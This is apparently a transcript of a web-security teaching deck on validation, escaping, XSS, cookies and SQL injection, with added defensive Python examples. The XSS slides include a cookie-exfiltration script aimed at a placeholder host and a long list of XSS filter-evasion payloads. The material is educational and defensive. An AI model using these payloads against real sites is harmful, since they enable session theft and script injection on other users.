Basic Web Application Security - PowerPoint PPT Presentation

Basic Web Application Security. User Input. Kick Your Arse. Three Ways. (All Awesome). Validation. Passive. (No touchy-touchy). This is a Number. 2. This is not a Number. a. This is really not a Number. <script>alert('loldongs')</script>. Filtering. Destructive. (One-Way Street).


PowerPoint Slideshow about 'Basic Web Application Security' - ella


Presentation Transcript
Three Ways

(All Awesome)

Passive

(No touchy-touchy)

This is really not a Number.

<script>alert('loldongs')</script>

Destructive

(One-Way Street)

What happens when you screw it up?

White-Listing → Usability Problems

Black-Listing → Security Problems

(Always a trade-off.)
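As an added example (not from the deck), here are the three kinds of handling in Python, run on the slides' own inputs: a passive allow-list validator for "this is a number", the allow-list/deny-list trade-off, and a deny-list filter that is defeated by one of the nested-tag payloads from the filtering slides later in the deck. The function names and the username policy are this example's assumptions, not anything the deck prescribes.

```python
import re


def is_number(value):
    """Validation (passive): answer yes or no, never modify the input.
    Allow-list: an optional sign and digits are a number; nothing else is."""
    return re.fullmatch(r"-?\d+", value) is not None


def allow_list_username(value):
    """Allow-list validation: only characters we expect, everything else rejected.
    Safe, but "Sam O'Brien" cannot sign up: the usability problem on the slide.
    (The policy itself is an assumption made for this example.)"""
    return re.fullmatch(r"[A-Za-z0-9_]{3,16}", value) is not None


def deny_list_clean(value):
    """Filtering (destructive) by deny-list: strip characters believed dangerous.
    Everything not on the list sails through, including a javascript: URL that
    happens to contain none of them."""
    return value.translate(str.maketrans("", "", "<>\"'"))


def strip_script_tags(value):
    """Deny-list filter for a single tag. Removing the inner match of a nested
    payload reassembles the outer one, so the output is worse than the input."""
    return re.sub(r"(?is)<script\b[^>]*>.*?</script\s*>", "", value)


if __name__ == "__main__":
    for sample in ("2", "a", "<script>alert('loldongs')</script>"):
        print(repr(sample), "is a number:", is_number(sample))
    print("Sam O'Brien allowed:", allow_list_username("Sam O'Brien"))
    print("deny-list leaves:", deny_list_clean("javascript:alert(1)"))
    # Payload from the "THIS HARD" slides: the filter rebuilds a <SCRIPT> tag.
    print("after stripping:", strip_script_tags("<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>"))
```

The last call is the whole argument in one line: a filter that deletes what it recognises has to be run until nothing changes, and even then only catches what it recognises. The allow-list validator never has that problem, at the price of turning Sam away.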

Transport

Point A → Point B

HTML

<b>Huh.</b>

<p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p>

<b>Huh</b>

SQL

Sam O’Brien

INSERT INTO mah_peeps (name)

VALUES ('Sam O\'Brien');

1, Sam O’Brien, 2010-09-02 18:30:00

XSS

(Cross-Site Scripting)

XSS

(XTREME Site Scripting)

Sticking Scripts Where They Don’t Belong.

You there, down the back.

Stop sniggering.

<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Oh shit.

<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>

Oooooooooooooooooh shit.

Why is this really uncool?

(Because shut up.)

HTTP

Hyper-Text Thingy I-forgot-again

It can guess. (Badly.)

IP Address

Browser User-Agent

Sends a cookie with each request.

(A basket of goodies that the browser sends faithfully every request.)

The Server puts a unique ID in the basket.

PHPSESSID=123your456mum789

__utma=12948.23.4211414.5553

is_a_furry=1

Browser sends the ID every request.

PHPSESSID=123your456mum789

THEY HAVE YOUR COOKIE.

Ooooooooooooooooooooooo-
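What the exfiltration script on the earlier slide actually gets is whatever `document.cookie` exposes. This added Python example (not from the deck) builds the Set-Cookie header the server sends to put its ID in the basket, with and without the HttpOnly, Secure and SameSite attributes, and models what a script running in the page can read. The cookie name PHPSESSID and the values come from the slides; the browser model is this example's simplification (a real browser also applies path, domain and expiry), and `samesite` as a cookie attribute needs Python 3.8 or later.

```python
from http.cookies import SimpleCookie


def session_cookie_header(session_id, hardened=True):
    """The Set-Cookie header value that puts the server's ID in the basket.

    hardened=True adds the attributes the slide's attack depends on being
    absent: HttpOnly keeps the cookie out of document.cookie, Secure keeps it
    off plain HTTP, SameSite=Lax keeps it off most cross-site requests.
    """
    jar = SimpleCookie()
    jar["PHPSESSID"] = session_id
    jar["PHPSESSID"]["path"] = "/"
    if hardened:
        jar["PHPSESSID"]["httponly"] = True
        jar["PHPSESSID"]["secure"] = True
        jar["PHPSESSID"]["samesite"] = "Lax"   # attribute known to Python 3.8+
    return jar.output(header="").strip()


def script_visible_cookies(set_cookie_headers):
    """Model of document.cookie: every cookie the server set WITHOUT HttpOnly,
    in the "a=1; b=2" form the slide's script would append to its image URL.
    (Simplification: path, domain and expiry are ignored here.)"""
    visible = []
    for header in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            if not morsel["httponly"]:
                visible.append("%s=%s" % (name, morsel.value))
    return "; ".join(visible)


if __name__ == "__main__":
    # Constructed headers using the cookie names from the slides.
    weak = session_cookie_header("123your456mum789", hardened=False)
    strong = session_cookie_header("123your456mum789")
    others = ["__utma=12948.23.4211414.5553; Path=/", "is_a_furry=1; Path=/"]
    print("Set-Cookie (weak):  ", weak)
    print("Set-Cookie (strong):", strong)
    print("script sees (weak):  ", script_visible_cookies([weak] + others))
    print("script sees (strong):", script_visible_cookies([strong] + others))
```

With the hardened header the stolen basket still contains the analytics and furry cookies, but not the session ID, which is the one the attacker wanted. HttpOnly does not fix the XSS; it only takes the cheapest prize off the table, so it is a second line, not a substitute for escaping output.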

HTML

Validation Really Hard.

HTML

Filtering Still Really Hard.

  • Use a library, eg. HTML Purifier.
HTML

Escaping Dead Easy.

Most languages have stuff to handle this, eg.

htmlentities(), cgi.escape() (html.escape() in Python 3), CGI.escapeHTML()

How hard is filtering?

(It’s just <script>, right?)

THIS HARD.

<IMG SRC=javascript:alert('a')>

<img src=javascript:alert(&quot;a&quot;)>

<img """><script>alert('a')</script>">

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="javascript:alert('a');">

<IMG SRC="jav&#x09;as&#x09cript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<SCR\0IPT>alert('a')</SCR\0IPT>

<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>

<img onmouseover!#$%&=alert('a')>

<<SCRIPT>alert("a");//<</SCRIPT>

<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>

<SC\0RIPT SRC=http://foo/x.js?<B>

<script src=//foo/x.js>

<img src="javascript:alert('a')"

(Well, then.)

THIS HARD.

<iframe src=http://foo/x.html <

<body background="javascript:alert('a')">

<BODY ONLOAD=alert('a')>

<img dynsrc="javascript:alert('a')">

<img lowsrc="javascript:alert('a')">

<BGSOUND SRC=javascript:alert('a')>

<BR SIZE="&{alert('a')}">

<LAYER SRC="http://foo/x.html"></LAYER>

<link rel="stylesheet" href="javascript:alert('a');">

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE>

<IMG SRC='vbscript:msgbox("a")'>

<img src="livescript:alert('a')">

¼script¾alert(¢XSS¢)¼/script¾ (US-ASCII encoding evasion)

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('a');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

(Well, then.)

THIS HARD.

<DIV STYLE="background-image: url(javascript:alert('a'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('a'))">

<DIV STYLE="width: expression(alert('a'));">

<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">

exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("a"))'>

<STYLE TYPE="text/javascript">alert('a');</STYLE>

<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A>

<BASE HREF="javascript:alert('a');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT>

<EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

(Well, then.)
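The sensible answer is still the library the deck names (HTML Purifier). This added example (not from the deck, and not HTML Purifier's code) shows the shape such a library has to take to survive the three lists above: parse the markup, keep only an allow-list of tags and attributes, and rebuild the output from the parsed form rather than copying any of the input through. A deny-list that searches the raw text cannot do this, because the entity encodings, tabs, newlines and nulls on the slides exist precisely to defeat text matching. The allow-list policy, the scheme list and the function names are this example's assumptions; it uses Python's standard `html.parser`, which decodes entities in attribute values before handing them over.

```python
import html
import re
from html.parser import HTMLParser

# Allow-list policy (an assumption for this example): tag -> attributes kept.
# Event handlers, style, dynsrc/lowsrc, background etc. are simply not listed.
ALLOWED_TAGS = {"b": set(), "i": set(), "p": set(), "a": {"href"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
VOID_TAGS = {"img"}
SAFE_SCHEMES = {"http", "https"}
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):")


def safe_url(value):
    """Return the URL if its scheme is allowed, else None.

    The parser has already decoded entities (&#106; and &#x6A become 'j'), so
    what is left of the slide tricks is whitespace/control-character padding
    ("jav\tascript:", "&#1;javascript:") and case games. Strip everything at or
    below a space, then match the scheme case-insensitively.
    """
    cleaned = "".join(ch for ch in value if ch > " ")
    m = _SCHEME.match(cleaned.lower())
    if m and m.group(1) not in SAFE_SCHEMES:
        return None
    return cleaned


class AllowListFilter(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # allowed tags still open, so we can close them
        self.skipping = None  # 'script' or 'style' whose body we discard

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skipping = tag     # drop the element AND its contents
            return
        if tag not in ALLOWED_TAGS:
            return                  # tag dropped; its text still comes through, escaped
        parts = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue
            if name in URL_ATTRS:
                value = safe_url(value)
                if value is None:
                    continue
            parts.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(parts)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag == self.skipping:
            self.skipping = None
            return
        if tag in self.open_tags:
            while True:             # close anything left open inside it, then it
                inner = self.open_tags.pop()
                self.out.append("</%s>" % inner)
                if inner == tag:
                    break

    def handle_data(self, data):
        if self.skipping is None:
            self.out.append(html.escape(data, quote=False))

    def result(self):
        while self.open_tags:       # never leave an allowed tag dangling
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize(fragment):
    """Re-serialise FRAGMENT keeping only allow-listed tags and attributes."""
    f = AllowListFilter()
    f.feed(fragment)
    f.close()
    return f.result()


if __name__ == "__main__":
    # A few of the vectors from the slides, plus legitimate markup.
    for sample in ("<b>Huh.</b>",
                   "<IMG SRC=javascript:alert('a')>",
                   '<IMG SRC="jav&#x09;ascript:alert(\'XSS\');">',
                   "<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>",
                   "<BODY ONLOAD=alert('a')>hi"):
        print(repr(sample), "->", repr(sanitize(sample)))
```

The important design choice is in `sanitize`: nothing from the input reaches the output except through `html.escape` or through the allow-list, so an encoding the parser did not understand is escaped as text instead of being passed through as markup. That still leaves the parser itself as the attack surface (the deck's point that filtering is "still really hard"), which is the reason to prefer a maintained library over this sketch.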

That injected code can trigger forms, run javascript functions, or make AJAX calls.

(... Oooooh.)

Send someone to a link that looks like: http://my.site/?user=<script>doStuff();</script>

(... Oooooooooh.)

Or store something that will output this on someone's profile page: <script>doStuff();</script>

(... Oooooooooooooooh.)

The Human Element

Touchy-Feely Commie Bullshit.

SQL

insert("INSERT INTO posts VALUES ('".sql_safe($title)."', '".sql_safe($content)."', '".sql_safe($author)."')");

SQL

or

SQL

insert("INSERT INTO posts VALUES (:title, :content, :author)", $title, $content, $author);

HTML

<h3><%= title %> - <%= date %></h3>

<div><%= raw(post_body) %></div>

<p>Written by <%= author %></p>

HTML

<h3><?=htmlentities($title);?> - <?=htmlentities($date);?></h3>

<div><?=$post_body;?></div>

<p>Written by <?=htmlentities($author);?></p>
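The two SQL slides and the two HTML slides above are the same rule applied at two boundaries, and they also answer the "send someone a link with ?user=<script>" slides: whatever arrives gets escaped for the place it is going. This added Python/SQLite example (not the deck's PHP) puts them together on the deck's own inputs: Sam O'Brien into the database, then `<b>Huh.</b>` and a `<script>` title back out as HTML. One caveat the slide glosses over: the backslash escape it shows (`O\'Brien`) is MySQL's; SQLite and standard SQL double the quote instead, which is exactly why the parameterised form, where the driver does the escaping for its own database, is the one to use. `sql_safe` keeps the slide's name but its body is this example's; `post_body` is emitted raw on the assumption that it has already been through the HTML filter, as the `raw()` slide intends.

```python
import html
import sqlite3


def sql_safe(value):
    """Escaping for the SQL boundary, SQLite/ANSI style: double every single
    quote so it cannot end the string literal. (The slide's sql_safe() does
    MySQL-style backslash escaping; this body is an assumption.)"""
    return value.replace("'", "''")


def insert_post_naive(db, title, content, author):
    """No escaping at all: the quote in Sam O'Brien ends the literal early."""
    db.execute("INSERT INTO posts VALUES ('%s', '%s', '%s')" % (title, content, author))


def insert_post_escaped(db, title, content, author):
    """The first SQL slide: escape each value for THIS database, then concatenate."""
    db.execute("INSERT INTO posts VALUES ('%s', '%s', '%s')"
               % (sql_safe(title), sql_safe(content), sql_safe(author)))


def insert_post_parameterised(db, title, content, author):
    """The second SQL slide: statement and values travel separately, so the
    database never re-parses the values and nothing needs escaping."""
    db.execute("INSERT INTO posts VALUES (:title, :content, :author)",
               {"title": title, "content": content, "author": author})


def render_post(title, date, post_body, author):
    """The HTML slides: escape on the way into HTML. Everything is escaped
    except post_body, which must already have been through the HTML filter."""
    return ("<h3>%s - %s</h3>\n<div>%s</div>\n<p>Written by %s</p>"
            % (html.escape(title), html.escape(date), post_body, html.escape(author)))


def demo():
    """Run all three inserts and one render; return what happened."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (title TEXT, content TEXT, author TEXT)")
    author = "Sam O'Brien"          # the deck's example value
    try:
        insert_post_naive(db, "Hello", "<b>Huh.</b>", author)
        naive_failed = False
    except sqlite3.OperationalError:  # SQLite: syntax error near "Brien"
        naive_failed = True
    insert_post_escaped(db, "Hello", "<b>Huh.</b>", author)
    insert_post_parameterised(db, "Hello", "<b>Huh.</b>", author)
    stored = [row[0] for row in db.execute("SELECT author FROM posts")]
    # A title taken straight from the ?user=<script>doStuff();</script> link.
    page = render_post("<script>doStuff();</script>", "2010-09-02 18:30:00",
                       "<b>Huh.</b>", author)
    return {"naive_failed": naive_failed, "stored": stored, "page": page}


if __name__ == "__main__":
    result = demo()
    print("naive insert failed:", result["naive_failed"])
    print("stored authors:", result["stored"])
    print(result["page"])
```

Both the escaped and the parameterised insert store the name intact; the difference is that the parameterised one stays correct when the database, its quoting rules or its character set change, while `sql_safe` has to be kept in step by hand. On the HTML side the same asymmetry applies: escaping every interpolation by default and opting out only for the filtered body (the `raw()` slide) fails safe, whereas calling `htmlentities()` on each field by hand (the PHP slide) fails the first time someone forgets.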